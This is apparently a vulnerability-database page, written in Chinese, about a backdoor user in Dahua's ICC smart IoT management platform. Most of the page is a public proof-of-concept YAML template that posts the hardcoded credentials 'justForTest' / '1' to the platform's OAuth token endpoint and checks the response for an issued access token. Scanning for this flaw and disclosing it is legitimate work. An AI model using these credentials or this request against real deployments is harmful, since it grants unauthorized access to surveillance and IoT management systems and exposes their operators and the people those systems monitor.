dahua-icc-backdoor-user: 大华 ICC 智能物联综合管理平台后门用户

日期: 2025-09-01 | 影响软件: 大华ICC智能物联综合管理平台 | POC: 已公开

漏洞描述

大华 ICC 智能物联综合管理平台后门用户

PoC代码[已公开]

id: dahua-icc-backdoor-user

info:
  name: 大华 ICC 智能物联综合管理平台后门用户
  author: Observer
  severity: high
  verified: true
  description: |
    大华 ICC 智能物联综合管理平台后门用户
  tags: icc,backdoor
  created: 2023/12/08

rules:
  r0:
    request:
      method: POST
      path: /evo-apigw/evo-oauth/oauth/token
      body: username=justForTest&password=1&grant_type=password&client_id=web_client&client_secret=web_client&public_key=
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'"success":') && 
      response.body.bcontains(b'"access_token":') && 
      response.body.bcontains(b'"token_type":')
expression: r0()

相关漏洞推荐